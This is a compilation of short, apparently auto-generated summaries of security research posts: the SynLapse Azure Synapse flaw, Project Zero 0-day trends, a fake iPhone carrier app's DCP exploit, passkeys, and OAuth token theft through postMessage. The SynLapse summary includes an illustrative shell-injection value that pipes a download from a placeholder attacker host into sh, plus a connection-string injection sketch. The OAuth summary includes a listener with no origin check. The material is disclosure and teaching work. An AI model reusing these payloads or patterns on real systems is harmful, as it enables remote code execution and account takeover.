SynLapse: Azure Synapse Analytics Service Vulnerability - Orca Security 1
This blog describes the technical details of SynLapse, published now that Microsoft has implemented improvements to tenant isolation.
Tzah Pahima discovered SynLapse, a vulnerability in Microsoft Azure Synapse Analytics that allowed attackers to bypass tenant separation and obtain credentials to other Azure Synapse customer accounts.
Microsoft took over 100 days to fully fix the vulnerability, and Orca Security was awarded $60,000 for the discovery. Orca was able to bypass the initial patch, and Microsoft finally revoked the certificate used to reach the internal control server.
SynLapse enabled attackers to access Synapse resources belonging to other customers via an internal Azure API server managing the integration runtimes. They could also run remote code on any customer's integration runtimes.
A shell injection vulnerability was found in the Magnitude Simba Redshift ODBC connector used by Microsoft's software, leading to remote code execution (RCE).
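The summary doesn't detail the exact injection point, but the bug class is familiar: an externally supplied connection parameter interpolated into a shell command. A minimal TypeScript sketch of that pattern (purely illustrative, not the driver's actual code; the helper name is made up):

```typescript
// Purely illustrative sketch of the bug class, not the Simba driver's code:
// an attacker-controlled connection parameter is interpolated into a shell
// command without sanitization, so extra commands can be smuggled in.
import { execSync } from "node:child_process";

// Hypothetical helper that shells out using a value from the connection string.
function resolveHost(serverFromConnectionString: string): string {
  // UNSAFE: attacker-controlled input is concatenated into a shell command line.
  return execSync(`nslookup ${serverFromConnectionString}`).toString();
}

// A malicious "Server" property turns the lookup into remote code execution:
resolveHost("example.com; curl https://attacker.example/payload | sh");
```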
Integration runtimes are Windows machines that connect to external sources and process data. Self-hosted IRs are dedicated to a single customer by design, and Azure IRs are shared by multiple customers.
When attempting to connect to an Azure database using ODBC, Synapse won't allow you to choose an Azure-hosted runtime.
So now we have an RCE on a shared Synapse integration runtime owned by Azure, but the machine shouldn't have any special privileges.
We found credentials and tokens belonging to multiple companies in the memory of the TaskExecutor.exe process.
The shared integration runtime contained a client certificate used to authenticate to an internal management server. The management server's API permitted querying integration runtimes and other workspaces, as well as obtaining the Synapse workspace managed identities belonging to other customer accounts.
In short, a security flaw in the shared integration runtime exposed a client certificate for a powerful internal API server, enabling an attacker to compromise the service and access other customers' resources.
Microsoft blocked MicrosoftAccess and GenericOdbcConnector, but left GenericOdbcPartition open, which could still be used to create an ODBC connection.
The resulting ConnectionString contains properties such as Driver, Server, Database, Port, Username, SSLMode, SingleRowMode, KeepAliveTime, and ValidateConnectionString.
Every connector implements a function called BuildConnectionString, which is generally secure and uses standard .NET APIs.
If the ConnectionSettings object is null or empty, a new ConnectionSettings is created and its ConnectionString is returned.
The Salesforce connector uses a property called "extendedProperties", an ODBC-style string (converted to a dictionary) of keys and values, which it copies into the main ODBC connection string.
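A minimal sketch of how such parameter injection can work, assuming a naive connection-string builder (the names and behaviour here are assumptions for illustration, not the actual connector code):

```typescript
// Illustrative sketch of the injection pattern; property and function names
// are assumptions, not the actual connector code.
function buildConnectionString(props: Record<string, string>): string {
  // Keys and values are joined verbatim, so a value containing ';' can smuggle
  // in additional ODBC properties such as Driver.
  return Object.entries(props)
    .map(([key, value]) => `${key}=${value}`)
    .join(";");
}

const baseProps = { Driver: "{Expected Driver}", Server: "host", Database: "db" };

// Values copied from the attacker-controlled "extendedProperties" dictionary:
const extendedProps = { UID: "user;Driver={/path/to/attacker/library.so}" };

console.log(buildConnectionString({ ...baseProps, ...extendedProps }));
// -> Driver={Expected Driver};Server=host;Database=db;UID=user;Driver={/path/to/attacker/library.so}
```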
MSRC was patching and mitigating the vulnerabilities in the Redshift connector, so I tried to exploit other vulnerable connectors. Microsoft then patched the Salesforce connector I was exploiting as well, so I had to find another way to execute code.
When reporting the issue, we suggested that Microsoft implement a few mitigations, mainly a sandbox and least-privilege access to the management server. Microsoft has implemented all of the recommendations, and we have removed alerting on Synapse from within the Orca Cloud Security Platform.
Project Zero: 2022 0-day In-the-Wild Exploitation…so far 2
As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild. At least nine of these 0-days are variants of previously patched vulnerabilities, and at least half of these 0-days could have been prevented with more comprehensive patching and regression tests.
Many of the 2022 in-the-wild 0-day exploits are due to the previous vulnerability not being fully patched. In the case of the Windows win32k and the Chromium property access interceptor bugs, the root cause issue was not addressed.
When 0-day exploits are detected in-the-wild, it's a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can't be used again. To do that effectively, we need correct and comprehensive fixes.
Root cause analysis helps to understand how a vulnerability was introduced, and helps to ensure that a fix addresses the vulnerability.
Researchers often find more than one vulnerability at the same time by looking for similar bug patterns elsewhere, more thoroughly auditing the component that contained the vulnerability, etc.
Analyzing the proposed patch for completeness compared to the root cause vulnerability is important.
Exploit technique analysis helps vendors and security researchers understand how attackers are using vulnerabilities. By sharing exploit samples, the industry as a whole will benefit and developers will be able to create better solutions.
Project Zero: The curious tale of a fake Carrier.app 3
A fake My Vodafone carrier app was sideloaded onto a target's iPhone using the Apple Enterprise developer program, which allows companies to push "trusted apps" to their staff's iOS devices bypassing Apple's App Store review process.
The app is broken up into multiple frameworks, including a privilege escalation exploit wrapper and an agent that can exfiltrate files from the device.
Five of the exploits shared a common high-level structure, including manipulating the kernel heap to control object placement, triggering a kernel vulnerability, and turning that into something useful. The sixth exploit didn't have anything like that.
The Display Co-Processor (DCP) is a processor that ships with iPhone 12 and above and all M1 Macs.
Apple added a coprocessor to the display engine, which runs its own firmware. They moved most of the display driver into the coprocessor, and created a remote procedure call interface.
Before diving into DCP internals it's worth stepping back a little to understand what a co-processor is and what the consequences of compromising it might be.
SystemPlus performs thorough analyses of these dies; the DCP is likely a rectangular region taking up around the same amount of space as the four high-efficiency cores seen in the centre.
The firmware image is a .zip archive that contains the firmware for all of the device's co-processors: the DCP, modems, etc.
Function names make understanding code significantly easier, so I thought perhaps there was a DCP firmware image where the symbols hadn't been stripped, but every single one was stripped.
The exploit calls 3 different external method selectors on the AppleCLCD2 user client, the largest of which corresponds to this user client method in the kernel driver.
UnifiedPipeline2::rpc calls DCPLink::rpc, which calls AppleDCPLinkService::rpc, which calls rpc_caller_gated to allocate space in a shared memory buffer, copy the message into the buffer, and signal to the DCP that a message is available.
The DCP's rpc_callee_gated function unpacks the wire format and maps all the 4-letter RPC codes to function pointers.
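Conceptually, the dispatch looks something like the following sketch (the real firmware is compiled C++; the codes and handlers here are placeholders, not the actual firmware interface):

```typescript
// Conceptual sketch only: each incoming message carries a 4-character tag
// that selects a handler from a table. Codes and handlers are placeholders.
type RpcHandler = (payload: Uint8Array) => Uint8Array;

const handlers: Record<string, RpcHandler> = {
  AAAA: (payload) => payload,              // placeholder: e.g. a property setter
  BBBB: (payload) => payload.slice(0, 4),  // placeholder: e.g. a block handler
};

function rpcCalleeGated(tag: string, payload: Uint8Array): Uint8Array {
  const handler = handlers[tag]; // unpack the wire format, look up the handler
  if (!handler) throw new Error(`unknown RPC code ${tag}`);
  return handler(payload);
}
```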
The challenge here is to figure out where a virtual call goes. We can't just set a breakpoint, so we have to decompile all the vtables and see if the prototypes look reasonable.
The exploit calls a method twice, passing two different values for first_scalar_input, 7 and 19. These correspond to looking up two different block handler objects.
It's possible to control bytes in the setBlock_Impl functions by passing a different value for the first scalar argument to external method 78 via IOConnectCallMethod.
The raw "block" input to each of those setBlock_Impl methods isn't passed inline in the IOConnectCallMethod structure input, but rather via an array of supported "subtypes" that contain metadata.
The DCP requests a memory mapping from a user task, and the AP sends back the raw task struct pointers so that the kernel can perform the mapping from the correct task.
The exploit calls two setBlock_Impl methods, 7 and 19. Method 7 is fairly simple and puts controlled data in a known location; method 19 is buggy, and sets and gets a data structure containing correction information.
The structure of the code makes it look like the compensator->inline_buffer buffer is 0xc000 bytes (three 16k pages) large. We need to find the allocation site of this compensator object to verify this.
The inner loop increments the destination pointer by 0x100 each iteration, and the outer loop writes to three subsequent 0x4000 byte blocks. The third iteration writes 0x4618 bytes, overflowing the allocation size by 0x34 bytes.
The input buffer is fully consumed with no "rewinding", so 0xe5b0 bytes are consumed; the first byte that corrupts an object is at offset 0xe57c.
The trail goes cold here, and we can't fully recreate the rest of the exploit. But based on the flow of the rest of the exploit it's pretty clear what happens next.
The DCP makes RPC calls to the AP to access memory, and the DCP exploit uses this interface to read and write AP memory.
ImperialViolet - Passkeys 4
Google is making a push to take WebAuthn to the masses, replacing security keys with phones and backing up the private keys themselves. The WebAuthn spec is not a gentle introduction, but you can find several guides on how to make the API calls.
Security keys, laptops, phones, and Windows Hello are all examples of authenticators. Authenticators maintain a map of the user's credentials.
A website's RP ID is a domain name. A site can use its own domain, or any parent domain of it, as its RP ID, as long as the result is at least an eTLD+1 (so https://accounts.example.com could use example.com, but not com).
The spec says that a user ID mustn't contain identifiable information, so you should generate a large random value on demand and store it in a column in your users table.
An authenticator maps (RP ID, user ID) pairs to credentials, so a given authenticator stores only one credential per account on a site.
A credential is a collection of various fields, including a private key, metadata, and user information. The user name, display name, and ID are the three pieces of user information.
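As a rough illustration, registration might look like the following sketch (the RP ID, user details, and algorithm list are illustrative; a real deployment would fetch the challenge from the server and verify the returned credential there):

```typescript
// Rough registration sketch using the WebAuthn API; values are illustrative.
async function registerPasskey() {
  const userId = crypto.getRandomValues(new Uint8Array(16)); // random, non-identifying user ID

  return navigator.credentials.create({
    publicKey: {
      rp: { id: "example.com", name: "Example" },
      user: {
        id: userId,                  // stored alongside the account on the server
        name: "alice@example.com",   // shown in credential pickers
        displayName: "Alice",
      },
      challenge: crypto.getRandomValues(new Uint8Array(32)),
      pubKeyCredParams: [{ type: "public-key", alg: -7 }],   // ES256
    },
  });
}
```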
A passkey is a WebAuthn credential that is safe and available when the user needs it, i.e. backed up.
Structurally, an account has only a single password but can have multiple passkeys. Users will register a passkey as needed to cover their set of devices.
When there are multiple passkeys registered on a site, users will need to manage them. Usually, sites will list them in the user's account settings, and the user will be prompted to name them.
The backup state bit in the authenticator data allows sites to determine when it might be time to ask the user to remove their password. If the backup state bit is set, the passkey will survive the loss of the device.
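As a sketch, a relying party could read those flags from the authenticator data like this (offsets and bit positions follow the WebAuthn spec; the helper name is my own):

```typescript
// Sketch: reading the backup flags from the authenticator data returned during
// registration or assertion. The flags byte sits at offset 32, after the
// 32-byte RP ID hash; BE (backup eligible) is bit 3 and BS (backup state) is bit 4.
function isBackedUp(authenticatorData: Uint8Array): boolean {
  const flags = authenticatorData[32];
  const backupEligible = (flags & 0x08) !== 0; // BE: the credential can be backed up
  const backupState = (flags & 0x10) !== 0;    // BS: the credential is currently backed up
  return backupEligible && backupState;
}
```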
Account hijacking using "dirty dancing" in sign-in OAuth-flows - Detectify Labs 5
Ten years ago, I was inspired by Nir Goldshlager and Egor Homakov to try to figure out how to steal OAuth tokens.
Combining response-type switching, invalid state, and redirect_uri quirks in OAuth flows with third-party JavaScript inclusions creates multiple vulnerable scenarios that could lead to account takeovers.
I've been looking for bugs related to postMessage implementations for a long time, and I built a Chrome extension to simplify inspecting all postMessage-listeners for all windows in each tab. I suspected that weak or no origin-checks in postMessage-listeners would leak location.href, which would allow me to steal OAuth tokens.
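The vulnerable pattern looks roughly like this (a hypothetical third-party listener; the message shape is made up for illustration):

```typescript
// Hypothetical third-party listener of the vulnerable kind.
window.addEventListener("message", (event: MessageEvent) => {
  // Missing origin check, e.g.: if (event.origin !== "https://widget.example") return;
  if (event.data === "getUrl") {
    // Replies with the page URL, which on an OAuth redirect page can still
    // contain the authorization code or token in the query or fragment.
    (event.source as Window | null)?.postMessage({ url: location.href }, "*");
  }
});
```

Any window that can obtain a reference to that page, for example a popup it opened or its opener, can then send the message and harvest the code or token from the returned URL.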
To start the investigation, I went through all sign-in flows on popular websites that run bug bounties, and saved the sign-in URLs for all providers. I also made note of any interesting postMessage-listeners or any other third-party scripts loaded on the website.
Know what kind of pages are involved in the OAuth-dance, and make sure they do not use any third-party scripts. This will prevent any future potential token leakage.
Acknowledgement
The above summaries are automatically generated by Wordtune.